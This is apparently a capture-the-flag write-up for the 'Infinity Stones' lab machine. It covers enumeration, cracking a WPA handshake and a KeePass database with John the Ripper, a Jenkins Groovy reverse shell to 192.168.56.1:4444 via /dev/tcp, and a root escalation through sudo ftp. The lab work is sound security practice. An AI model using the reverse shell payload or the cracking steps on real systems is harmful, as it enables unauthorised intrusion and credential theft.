Infinity stone writeup

Infinity Stones

Author: Aarti singh

Nmap

Woah simple nmap scan gives us one of the stones.

MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

So there are 3 port opens. Even HTTPS is running there. We’ll start our enumeration with HTTP service.

HTTP

We can see website have some kind of story about Thanos and Avengers.

I did a gobuster scan on the website and found few directories.

Interesting thing is there are two directory for images. The /images holds all the images we see on the index page of the website. And /img holds one image named space.jpg

In that image I found the first stone i.e space stone.

In /wifi I found two files named pwd.txt and reality.cap.

In the pwd.txt I found some hint for the password for something.

this means the password will have to something like gamA11bb2012. I was not sure what the password was for. So I decided to note down that information and move onto the reality.cap file.

It was a pcap file that had 802.11 protocol so basically we need a password to decrypt all the data.

I first converted the .cap file to hccap and from there I used hccap2john to get hashes and then cracked the hashes in 2 minutes.

➜ aircrack-ng reality.cap -J password

Now use hccap2john to get hashes for JTR

➜ hccap2john password.hccap > hash.txt
➜ john -mask="gam?u?d?d?l?l2012" -min-len=12 -max-len=12 hash.txt

?u - upper letter
?d - digits
?l - lower letter

gamA00fe2012 (Kavish_2.4Ghz)

I tried using this password to decrypt the .cap file packets but it didn’t worked which was really weird because JTR said that this is the password to decrypt it.

Then @badhackjob gave me hint telling me that .cap file is just a rabbit hole and we don’t need anything from that. All we needed a cracked password thats all. Once we have that password we can move ahead without any problem. I tried to use this password as SSH password with username as stones but that also didn’t worked. Then I tried it as the directory gamA00fe2012 and it gave me the reality stones.

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

Then I had to message @anushibin007 to ask for help(again) because I couldn’t understand what to do. He said that I need to visit aether.php and then use answers as binary. Meaning every true will be 1 and false would be 0 and then that would give another directory. I used crunch to generate a list having all the combinations of 8 digit formed using 01.

➜ crunch 8 8 01 -o crunched.txt

Then used gobuster to find the right dir.

That dir gave me a file name hints.txt

and that file had some brainfuck code in it.

+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<

I used online compiler to run it and that gave me credentials

admin:avengers

I rescanned the network and now there was a new port open i.e 8080

HTTP - 8080

Those were credentials for jenkins running on port 8080.

Since we have access to jenkins we can exploit Groovy script to get the reverse shell. In order to do that go to Manage jenkins and then find Script console option and type the following cod

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.1/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

and while you listener is listing on port 4444 run that command to get a reverse shell.

Horizontal Privilege escalation

I downloaded my enumeration script and ran which found that there were two users named morag and stones. Also I found a SUID with root permission in /opt/script

When I ran that binary I got timestone.

TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

Also in /opt I found morag.kdbx. I downloaded that files to my system and used JTR to crack it’s password.

➜ keepass2john morag.kdbx > hash.txt
➜ john --wordlist=CTFs/lists/rockyou.lst hash.txt

morag: princesa

Since I have password for kdbx I used kpcli to get power stone and password for morag.

POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}

morag:1HDD6pvuyUuZeNucpCpz

But in another directory of that same kdbx file I found another creds.

I decoded the note and I got:

morag:yondu

This was the correct set of credentials that worked on SSH

Vertical privilege escalation

I ran the sudo -l command and found out that morag can run ftp as root.

Using gtfo I searched gtfobins for any way to exploit this sudo right.

I used the

$ sudo ftp
ftp > !/bin/sh

Then I got the root flag.

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

This machine was kinda guessy. One would have to guess the binary part and that password to directory part. But both the privilege escalations were pretty neat.

Thanks to Aarti singh for making this machine.

Also thanks to @badhackjob and @anushibin007 for helping me out.

Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more “Writeups”.